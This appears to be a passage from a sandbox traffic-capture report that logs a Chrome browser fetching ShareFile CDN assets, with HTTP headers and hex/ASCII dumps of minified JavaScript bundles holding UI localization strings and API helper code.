                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 50 72 65 73 73 65 2d 70 61 70 69 65 72 73 20 21 22 2c 63 75 73 74 6f 6d 5f 65 6c 6c 69 70 73 69 73 3a 22 50 65 72 73 6f 6e 6e 61 6c 69 73 65 72 2e 2e 2e 22 2c 64 61 74 65 3a 7b 6a 75 6d 70 5f 62 61 63 6b 5f 6d 6f 6e 74 68 3a 22 52 65 76 65 6e 69 72 20 75 6e 20 6d 6f 69 73 20 65 6e 20 61 72 72 69 c3 a8 72 65 22 2c 6a 75 6d 70 5f 62 61 63 6b 5f 79 65 61 72 3a 22 52 65 76 65 6e 69 72 20 75 6e 65 20 61 6e 6e c3 a9 65 20 65 6e 20 61 72 72 69 c3 a8 72 65 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 6d 6f 6e 74 68 3a 22 41 76 61 6e 63 65 72 20 64 27 75 6e 20 6d 6f 69 73 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 79 65 61 72 3a 22 41 76 61 6e 63 65 72 20 64 27 75 6e 20 61 6e 22 2c 73 65 6c 65 63 74 5f 64 61 74 65 3a 22 53 c3 a9 6c 65 63 74 69 6f 6e 6e 65 72 20
                                                                                                                                                                                                                      Data Ascii: Presse-papiers !",custom_ellipsis:"Personnaliser...",date:{jump_back_month:"Revenir un mois en arrire",jump_back_year:"Revenir une anne en arrire",jump_forward_month:"Avancer d'un mois",jump_forward_year:"Avancer d'un an",select_date:"Slectionner
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC2804INData Raw: 55 70 6c 6f 61 64 20 28 61 66 62 65 65 6c 64 69 6e 67 29 22 2c 45 6d 70 74 79 56 69 64 65 6f 73 49 63 6f 6e 3a 22 56 69 64 65 6f 20 28 61 66 62 65 65 6c 64 69 6e 67 29 22 2c 45 6d 70 74 79 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 57 65 72 6b 73 74 72 6f 6f 6d 20 28 61 66 62 65 65 6c 64 69 6e 67 29 22 2c 45 70 73 49 63 6f 6e 3a 22 45 50 53 2d 62 65 73 74 61 6e 64 22 2c 45 78 63 65 6c 49 63 6f 6e 3a 22 45 78 63 65 6c 2d 62 65 73 74 61 6e 64 22 2c 46 69 6c 65 62 6f 78 49 63 6f 6e 3a 22 42 65 73 74 61 6e 64 73 76 61 6b 22 2c 46 6c 61 73 68 49 63 6f 6e 3a 22 46 6c 61 73 68 2d 62 65 73 74 61 6e 64 22 2c 46 6f 6c 64 65 72 49 63 6f 6e 3a 22 4d 61 70 22 2c 49 6c 6c 75 73 74 72 61 74 6f 72 49 63 6f 6e 3a 22 49 6c 6c 75 73 74 72 61 74 6f 72 2d 62 65 73 74 61 6e 64
                                                                                                                                                                                                                      Data Ascii: Upload (afbeelding)",EmptyVideosIcon:"Video (afbeelding)",EmptyWorkflowIcon:"Werkstroom (afbeelding)",EpsIcon:"EPS-bestand",ExcelIcon:"Excel-bestand",FileboxIcon:"Bestandsvak",FlashIcon:"Flash-bestand",FolderIcon:"Map",IllustratorIcon:"Illustrator-bestand
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 61 20 64 65 20 74 72 61 6e 73 66 65 72 c3 aa 6e 63 69 61 21 22 2c 63 75 73 74 6f 6d 5f 65 6c 6c 69 70 73 69 73 3a 22 50 65 72 73 6f 6e 61 6c 69 7a 61 64 6f 2e 2e 2e 22 2c 64 61 74 65 3a 7b 6a 75 6d 70 5f 62 61 63 6b 5f 6d 6f 6e 74 68 3a 22 56 6f 6c 74 61 72 20 75 6d 20 6d c3 aa 73 22 2c 6a 75 6d 70 5f 62 61 63 6b 5f 79 65 61 72 3a 22 56 6f 6c 74 61 72 20 75 6d 20 61 6e 6f 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 6d 6f 6e 74 68 3a 22 41 76 61 6e c3 a7 61 72 20 75 6d 20 6d c3 aa 73 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 79 65 61 72 3a 22 41 76 61 6e c3 a7 61 72 20 75 6d 20 61 6e 6f 22 2c 73 65 6c 65 63 74 5f 64 61 74 65 3a 22 53 65 6c 65 63 69 6f 6e 61 72 20 64 61 74 61 22 7d 2c 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 3a 22
                                                                                                                                                                                                                      Data Ascii: a de transferncia!",custom_ellipsis:"Personalizado...",date:{jump_back_month:"Voltar um ms",jump_back_year:"Voltar um ano",jump_forward_month:"Avanar um ms",jump_forward_year:"Avanar um ano",select_date:"Selecionar data"},generic_error_message:"
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC2804INData Raw: 61 73 65 20 31 33 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 63 2e 73 74 6f 70 28 29 7d 7d 29 2c 63 29 7d 29 29 29 7d 2c 67 65 74 53 6f 72 74 65 64 50 72 6f 6a 65 63 74 73 42 79 43 6f 6e 74 61 69 6e 65 72 52 49 44 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 6c 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 72 2c 61 2c 69 3b 72 65 74 75 72 6e 20 6c 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6f 2e 70 72 65 76 3d 6f 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 3d 66 28 22 70 72 6f 6a 65 63 74 73 3f 63 6f 6e
                                                                                                                                                                                                                      Data Ascii: ase 13:case"end":return c.stop()}}),c)})))},getSortedProjectsByContainerRID:function(e,t,n){return(0,r.__awaiter)(this,void 0,void 0,l().mark((function o(){var r,a,i;return l().wrap((function(o){for(;;)switch(o.prev=o.next){case 0:return r=f("projects?con
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC12792INData Raw: 54 6f 50 72 6f 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 6c 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 72 2c 6f 3b 72 65 74 75 72 6e 20 6c 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 3d 66 28 22 70 72 6f 6a 65 63 74 73 2f 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 75 73 65 72 73 2f 62 75 6c 6b 41 64 64 22 29 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 68 65 61 64 65 72
                                                                                                                                                                                                                      Data Ascii: ToProject:function(e,t){return(0,r.__awaiter)(this,void 0,void 0,l().mark((function n(){var r,o;return l().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return r=f("projects/".concat(e,"/users/bulkAdd"),{method:"POST",body:JSON.stringify(t),header


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      115192.168.2.174983713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC581OUTGET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 19:10:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 07:16:16 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 eec12a22159207af63748eccf10799b2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: Ym-QGnEvnFXscZkxsm-UppMD25G6eCBXbZIZvaMP7Z14sYaoefqIuA==
                                                                                                                                                                                                                      Age: 44406
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      116192.168.2.174983613.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC427OUTGET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 55384
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 19:10:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:21 GMT
                                                                                                                                                                                                                      ETag: "d7fa53958e5ba828febe01a45075469e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 34f50889bc574f1edeb41dd758962a5a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 5oAFGwIL7akgF7OKlZlNycGITMSSwfGsdPbpite2Y7KGlYFdQzQM4A==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 76 69 65 77 61 70 70 72 6f 76 61 6c 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevreviewapprovalpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var r={},n={},a={},o={},i={},c={};return Object.defineProperty(o,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 6c 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 6c 3a 72 5b 33 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 6c 61 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 6c 3a 72 5b 33 5d 2c 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 76 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 76 3a 72 5b 33 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 76 61 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 76 3a 72 5b 33 5d 2c 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 65 78 38 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 72 3a
                                                                                                                                                                                                                      Data Ascii: a:r[4]};if(r=s.hsl.exec(e),r)return{h:r[1],s:r[2],l:r[3]};if(r=s.hsla.exec(e),r)return{h:r[1],s:r[2],l:r[3],a:r[4]};if(r=s.hsv.exec(e),r)return{h:r[1],s:r[2],v:r[3]};if(r=s.hsva.exec(e),r)return{h:r[1],s:r[2],v:r[3],a:r[4]};if(r=s.hex8.exec(e),r)return{r:
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 7d 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6e 7d 29 7d 2c 34 35 35 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 6d 36 3a 28 29 3d 3e 68 2c 42 44 3a 28 29 3d 3e 76 7d 29 3b 76 61 72 20 6e 3d 72 28 39 33 37 39 29 2c 61 3d 72 28 39 39 38 29 3b 76 61 72 20 6f 3d 22 64 61 74 61 2d 72 63 2d 6f 72 64 65 72 22 2c 69 3d 22 64 61 74 61 2d 72 63 2d 70 72 69 6f 72 69 74 79 22 2c 63 3d 22 72 63 2d 75 74 69 6c 2d 6b 65 79 22 2c 66 3d 6e 65 77 20 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 65 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                      Data Ascii: nt.createElement)}r.d(t,{A:()=>n})},4552:(e,t,r)=>{"use strict";r.d(t,{m6:()=>h,BD:()=>v});var n=r(9379),a=r(998);var o="data-rc-order",i="data-rc-priority",c="rc-util-key",f=new Map;function u(){var e=(arguments.length>0&&void 0!==arguments[0]?arguments[
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC5214INData Raw: 28 72 2e 6d 65 74 68 6f 64 3d 22 6e 65 78 74 22 2c 72 2e 61 72 67 3d 65 29 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 79 29 3a 69 3a 28 72 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 72 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 69 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 79 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 76 61 72 20 74 3d 7b 74 72 79 4c 6f 63 3a 65 5b 30 5d 7d 3b 31 20 69 6e 20 65 26 26 28 74 2e 63 61 74 63 68 4c 6f 63 3d 65 5b 31 5d 29 2c 32 20 69 6e 20 65 26 26 28 74 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 65 5b 32 5d 2c 74 2e 61 66 74 65 72 4c 6f 63 3d 65 5b 33 5d 29 2c 74 68 69 73 2e 74 72 79 45 6e 74
                                                                                                                                                                                                                      Data Ascii: (r.method="next",r.arg=e),r.delegate=null,y):i:(r.method="throw",r.arg=new TypeError("iterator result is not an object"),r.delegate=null,y)}function _(e){var t={tryLoc:e[0]};1 in e&&(t.catchLoc=e[1]),2 in e&&(t.finallyLoc=e[2],t.afterLoc=e[3]),this.tryEnt
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC1018INData Raw: 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 6f 70 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 70 61 72 61 6d 73 2e 63 6f 6e 74 61 69 6e 65 72 52 49 44 2c 70 69 6c 65 74 41 70 69 3a 72 7d 29 29 7d 29 2c 7b 64 72 61 77 65 72 50 72 6f 70 73 3a 7b 74 69 74 6c 65 3a 22 52 65 76 69 65 77 20 41 70 70 72 6f 76 61 6c 20 52 65 71 75 65 73 74 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 73 74 79 6c 65 73 3a 7b 62 6f 64 79 3a 7b 70 61 64 64 69 6e 67 3a 22 38 70 78 22 7d 7d 7d 7d 29 2c 72 2e 73 66 2e 72 65 67 69 73 74 65 72 56 69 65 77 45 6e 67 69 6e 65 52 65 73 6f 75 72 63 65 55 52 4c 52 65 77 72 69 74 65 28 7b 72 65 73 6f 75 72 63 65 54 79 70 65 3a 22 72 65 76 69 65 77 61 70 70 72 6f 76 61 6c 22 2c 64 65 66 61 75 6c 74 50 61 74 68 3a
                                                                                                                                                                                                                      Data Ascii: null===(n=e.options)||void 0===n?void 0:n.params.containerRID,piletApi:r}))}),{drawerProps:{title:"Review Approval Request",width:"100%",styles:{body:{padding:"8px"}}}}),r.sf.registerViewEngineResourceURLRewrite({resourceType:"reviewapproval",defaultPath:


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      117192.168.2.174983513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC623OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 795817
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:22 GMT
                                                                                                                                                                                                                      ETag: "1ef237d0b6617d5d9e82d98839b65753"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f9d671af272d3b5b3c683203ae8f4cc8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 3ZEk3TKYXUUSIpZHrHXZvOc42cyCAOBzLdnMhAiLrP6hb4UMbFCyFQ==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 5b 74 5d 3d 65 5b 74 5d 7d 29 29
                                                                                                                                                                                                                      Data Ascii: System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC12176INData Raw: 34 38 32 20 31 33 20 30 22 2c 66 69 6c 6c 3a 22 23 30 30 34 35 44 42 22 7d 29 2c 72 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 31 20 30 43 35 2e 31 37 33 2e 34 38 32 2e 34 38 32 20 35 2e 31 37 32 20 30 20 31 31 68 32 63 2e 34 36 39 2d 34 2e 37 32 33 20 34 2e 32 37 37 2d 38 2e 35 33 31 20 39 2d 39 56 30 5a 6d 30 20 32 32 63 2d 34 2e 37 32 33 2d 2e 34 37 2d 38 2e 35 33 31 2d 34 2e 32 37 36 2d 39 2d 39 48 30 63 2e 34 38 32 20 35 2e 38 32 38 20 35 2e 31 37 33 20 31 30 2e 35 31 38 20 31 31 20 31 31 76 2d 32 5a 6d 31 31 2d 39 63 2d 2e 34 36 39 20 34 2e 37 32 34 2d 34 2e 32 37 37 20 38 2e 35 33 2d 39 20 39 76 32 63 35 2e 38 32 37 2d 2e 34 38 32 20 31 30 2e 35 31 38 2d 35 2e 31 37 32 20 31
                                                                                                                                                                                                                      Data Ascii: 482 13 0",fill:"#0045DB"}),r["default"].createElement("path",{d:"M11 0C5.173.482.482 5.172 0 11h2c.469-4.723 4.277-8.531 9-9V0Zm0 22c-4.723-.47-8.531-4.276-9-9H0c.482 5.828 5.173 10.518 11 11v-2Zm11-9c-.469 4.724-4.277 8.53-9 9v2c5.827-.482 10.518-5.172 1
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 77 6e 49 63 6f 6e 3a 22 55 6e 6b 6e 6f 77 6e 20 66 69 6c 65 22 2c 55 72 6c 49 63 6f 6e 3a 22 57 65 62 20 61 64 64 72 65 73 73 22 2c 56 69 64 65 6f 49 63 6f 6e 3a 22 56 69 64 65 6f 20 66 69 6c 65 22 2c 56 73 64 49 63 6f 6e 3a 22 56 69 73 69 6f 20 66 69 6c 65 22 2c 57 61 72 6e 69 6e 67 49 63 6f 6e 3a 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 2c 57 6f 72 64 49 63 6f 6e 3a 22 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 66 69 6c 65 22 2c 5a 69 70 49 63 6f 6e 3a 22 5a 69 70 20 66 69 6c 65 22 7d 2c 74 61 62 6c 65 3a 7b 73 65 6c 65 63 74 5f 61 6c 6c 3a 22 53 65 6c 65 63 74 20 61 6c 6c 20 69 74 65 6d 73 22 7d 2c 74 69 6d 65 3a 7b 61 6d 3a 22 41 4d 22 2c 61 6d 5f 6f 72 5f 70 6d 3a 22 41 4d 20 6f 72 20 50 4d 22 2c 68 6f 75 72 3a 22 48 6f 75 72 22 2c 6d 69 6e 75 74
                                                                                                                                                                                                                      Data Ascii: wnIcon:"Unknown file",UrlIcon:"Web address",VideoIcon:"Video file",VsdIcon:"Visio file",WarningIcon:"Warning icon",WordIcon:"Microsoft Word file",ZipIcon:"Zip file"},table:{select_all:"Select all items"},time:{am:"AM",am_or_pm:"AM or PM",hour:"Hour",minut
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC12176INData Raw: 73 46 69 6c 65 49 63 6f 6e 3a 22 e6 89 bf e8 aa 8d e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 e3 82 aa e3 83 bc e3 83 87 e3 82 a3 e3 82 aa 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 e3 82 b3 e3 83 bc e3 83 89 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 e3 83 95 e3 82 a9 e3 83 bc e3 83 a0 20 e3 83 86 e3 83 b3 e3 83 97 e3 83 ac e3 83 bc e3 83 88 22 2c 43 77 54 65 6d 70 6c 61 74 65 49 63 6f 6e 3a 22 e3 83 af e3 83 bc e3 82 af e3 83 95 e3 83 ad e3 83 bc 20 e3 83 86 e3 83 b3 e3 83 97 e3 83 ac e3 83 bc e3 83 88 22 2c 43 77 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 e3 83 af e3 83 bc e3 82 af e3 83 95 e3 83 ad e3 83 bc 20 e3 82 a4 e3 83 b3 e3 82 b9 e3
                                                                                                                                                                                                                      Data Ascii: sFileIcon:"",AudioIcon:" ",CodeFileIcon:" ",CwFormIcon:" ",CwTemplateIcon:" ",CwWorkflowIcon:"
